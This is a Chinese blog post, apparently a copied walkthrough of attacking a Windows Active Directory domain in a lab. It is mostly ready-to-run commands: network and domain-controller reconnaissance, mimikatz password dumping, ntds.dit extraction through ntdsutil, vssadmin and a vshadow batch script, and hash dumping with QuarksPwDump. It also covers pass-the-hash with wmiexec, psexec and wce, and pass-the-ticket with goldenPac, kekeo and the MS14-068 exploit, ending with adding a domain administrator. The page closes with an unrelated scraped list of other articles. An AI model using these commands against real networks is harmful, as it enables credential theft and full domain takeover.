windows域渗透实战
测试环境
域控: 192.168.211.130
已经控制的机器: 192.168.211.133
获取网络信息
查看机器的网络信息
ipconfig /all # 查看 网卡信息,获取dns 服务器ip (域控)
arp -a # 搜集内网信息
net view #查看网络中的机器
net view /domain # 查看网络中的域
net view /domain:domainhack # 查看 domainhack 域中的机器
通过 ping 机器名 可以获取 ip
查找 域控
dsquery server
net time /domain
ipconfig /all 查看 dns 信息
端口扫描,域控服务器会开放389端口,如果和DNS同服务器,那么也会有53
ipc$ 攻击
net view 192.168.211.130 #查看共享
net use \\192.168.211.130\ipc$ password /user:hacker # ipc$ 连接
如果有共享的话,直接 copy 复制文件,然后 at 执行。
获取 hash
直接抓
使用 mimikatz 抓取登录过的明文
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt
导出 ntds.dit, 获取 hash
导出 ntds.dit
方法一 ntdsutil
ntdsutil snapshot "List All" quit quit # 列举快照
ntdsutil snapshot "activate instance ntds" create quit quit # 创建快照
ntdsutil snapshot "mount {77e43351-f29c-4bb2-86ad-cc6b7610589d}" # 挂载快照
copy C:\$SNAP_201803152221_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit #复制ntds.dit
操作完后记得删除快照
方法二 vssadmin
vssadmin list shadows # 查询当前系统的快照
vssadmin create shadow /for=c: #创建快照
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\ntds.dit c:\ntds.dit # 复制ntds.dit
vssadmin delete shadows /for=c: /quiet #删除快照
方法三 vshadow
下载链接
http://edgylogic.com/blog/vshadow-exe-versions/
创建 a.bat
setlocal
if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK
set SOURCE_DRIVE_LETTER=%SystemDrive%
set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit
set DESTINATION_PATH=%~dp0
@echo ...Determine the scripts to be executed/generated...
set CALLBACK_SCRIPT=%~dpnx0
set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd
@echo ...Creating the shadow copy...
"%~dp0vshadow-2008-x64.exe" -script=%TEMP_GENERATED_SCRIPT% -exec="%CALLBACK_SCRIPT%" %SOURCE_DRIVE_LETTER%
del /f %TEMP_GENERATED_SCRIPT%
@goto :EOF
:IS_CALLBACK
setlocal
@echo ...Obtaining the shadow copy device name...
call %TEMP_GENERATED_SCRIPT%
@echo ...Copying from the shadow copy to the destination path...
copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH%
把 vshadow-2008-x64.exe 放到 a.bat 同级目录(win 2008为例)
然后 cmd /c start a.bat 调用之, 就会在 a.bat 目录下生成 ntds.dit
然后使用
获取 system.hiv
reg save hklm\system system.hiv
QuarksPwDump.exe 导出 hash
QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file ntds.dit --system-file system.hiv
pass-the-hash 攻击
wmiexec
下载地址
https://github.com/maaaaz/impacket-examples-windows
wmiexec -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 domainhack/Administrator@192.168.211.130 "whoami"
domainhack 为域名
Administrator 域用户
192.168.211.130 目标 IP
psexec
psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 domainhack/Administrator@192.168.211.130 "whoami"
pass-the-ticket
goldenPac
要求:
域名, 普通域用户账号密码, 域控名
下载地址
https://github.com/maaaaz/impacket-examples-windows
直接获取域控system 权限的 cmd
goldenPac domainhack.com/hacker@domainc.domainhack.com
goldenPac 域名/用户名@域控名称
然后会要求输入密码
wce
要求:
域控用户名 ,hash (用前面的方法获取)
本机 administor 权限
wce -s Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09
keko
下载地址
https://github.com/gentilkiwi/kekeo
要求:
域控用户名 ,hash (用前面的方法获取)
生成票据
kekeo "tgt::ask /user:Administrator /domain:domainhack.com /ntlm:A812E6C2DEFCB0A7B80868F9F3C88D09"
导入票据
kekeo "kerberos::ptt TGT_Administrator@DOMAINHACK.COM_krbtgt~domainhack.com@DOMAINHACK.COM.kirbi"
ms14-068.exe
下载地址
https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-068/MS14-068.exe
要求:
域控用户名 , 密码
用户 sid # whoami /all 获取
执行命令
生成 票据
ms14-068.exe -u hacker@domainhack.com -s S-1-5-21-2864277510-2444243591-773573486-1113 -d 192.168.211.130 -p qaz123!@#
ms14-068.exe -u 用户名@域名 -s 用户sid -d 域控地址 -p 用户名密码
导入票据
Mimikatz.exe "kerberos::ptc TGT_hacker@domainhack.com.ccache"
导入票据后就相当于有了 域管理员的权限, 直接添加域管理员
参考
windows域渗透实战的更多相关文章
- Metasploit域渗透测试全程实录(终结篇)
本文作者:i春秋签约作家——shuteer 前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里.于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴 ...
- js中各种跨域问题实战小结(二)
这里接上篇:js中各种跨域问题实战小结(一) 后面继续学习的过程中,对上面第一篇有稍作休整.下面继续第二部分: -->5.利用iframe和location.hash -->6.windo ...
- 初级AD域渗透系列
net group /domain 获得所有域用户组列表 net group “domain admins” /domain 获得域管理员列表 net group “enterprise admi ...
- 域渗透基础之NTLM认证协议
域渗透基础的两个认证协议ntlm和Kerberos协议是必须总结的~ 这篇简单总结下ntlm协议 晚上写下kerberos 0x01 NTLM简介 NTLM使用在Windows NT和Windows ...
- 域渗透复盘(安洵CTF线下)
复盘线下域渗透环境Write Up 0x01 外网web到DMZ进域 外网web入口 joomla应用 192.168.0.5 反序列化打下来 GET /index.php HTTP/1.1 Ho ...
- AD域渗透总结
域渗透总结 学习并做了一段时间域网络渗透,给我直观的感受就是思路问题和耐心,这个不像技术研究,需要对一个点进行研究,而是遇到问题后要从多个方面思考,寻找"捷径"思路,只要思路正确, ...
- 【渗透实战】记一次艰难的内网漫游第四期_蹭我WIFI?看我如何利用组合拳日进蹭网者内网
/文章作者:Kali_MG1937 CSDN博客ID:ALDYS4 QQ:3496925334/ 内网漫游系列第三期:[渗透实战]记一次艰难的内网漫游第三期_我是如何利用APT攻击拿到内网最高权限的 ...
- js中各种跨域问题实战小结(一)
什么是跨域?为什么要实现跨域呢? 这是因为JavaScript出于安全方面的考虑,不允许跨域调用其他页面的对象.也就是说只能访问同一个域中的资源.我觉得这就有必要了解下javascript中的同源策略 ...
- C#开发中Windows域认证登录2(扩展吉日嘎拉GPM系统)
原文地址:http://www.cuiwenyuan.com/shanghai/post/Windows-AD-Logon-Intergrated-into-Jirigala-GPM-DotNet-B ...
随机推荐
- 微信小程序开发笔记1,认识小程序的项目构成
省去安装和基本操作, app.js脚本文件 qpp.json配置文件(添加删除页面,都要在这个文件下修改入口配置) app.wxss样式表文件 app前缀为全局的 在app.json中配置项目的每个页 ...
- Excel中线性规划求解
Excel中线性规划求解(如下图) 1. 设置目标输出单元格(蓝线线) 2. 设置线性规划模型目标函数中自变量(红线线) 3. 设置约束条件(黑色线) 4 如果目标函数中自变量要求是非负数,则勾选绿 ...
- css网页布局 --- 左边固定,右边自适应
div的布局统一如下: <body> <div class="wrap"> <div class="left"></d ...
- java I/O系统总结
1. InputStream : 从文件.网络.压缩包等中读取 需要的信息到程序中的变量 read(); read(byte []b ); mark(int readlimit); reset ...
- EJB3 阶段总结+一个EJB3案例 (2)
这篇博文接着上一篇博文的EJB案例. 在上一篇博文中,将程序的架构基本给描述出来了,EJB模块分为5层. 1)DB层,即数据库层 在则一部分,我使用的数据库为mysql.在EJB程序中,访问数据库是通 ...
- 【java排序】冒泡排序、快速排序
冒泡排序 冒泡排序是一种简单的排序算法.它重复地走访过要排序的数列,一次比较两个元素,如果他们的顺序错误就把他们交换过来.走访数列的工作是重复地 进行直到没有再需要交换,也就是说该数列已经排序完成.这 ...
- netsh 第一次用这命令
转载自 目标是WIN7 X64,且开启了防火墙,想要用他的机器去访问别的机器,又不想登陆他的系统,常规办法一般是上传一个htran,然后进行转发,但是对方有杀软,有被杀的可能性,所以我用另外一种办法达 ...
- win7、8上走网络打印机(需找驱动包,不能自动)
不多说,直接上干货! 简而言之,就是, 第一步是,将电脑与打印机联上网,进行匹配,即连上网可以查找到打印机的型号. 第二步是,安装驱动. D:\Driver\HP LJP2015 PCL6(注意,这个 ...
- android学习-ndk-build(androidstudio编译cocos2d-x库的cpp为so文件的解释)
本文不作为ndk初学使用,只是对cpp等c++文件编译成so文件的过程中,参数含义,及ndk配置的解释.使用的技术比较旧. androidStudio使用gradle调用ndk-build工具编译c+ ...
- 在Pycharm中使用AutoPEP8来检验代码的规范性
在学习python的过程中,我们经常会遇到代码不规范而导致的程序报错,代码的规范和严谨就显得尤为重要了,所以编写代码的过程中,我们需要遵循PE8规范,在Pycharm 中我们可以安装插件 AutoPE ...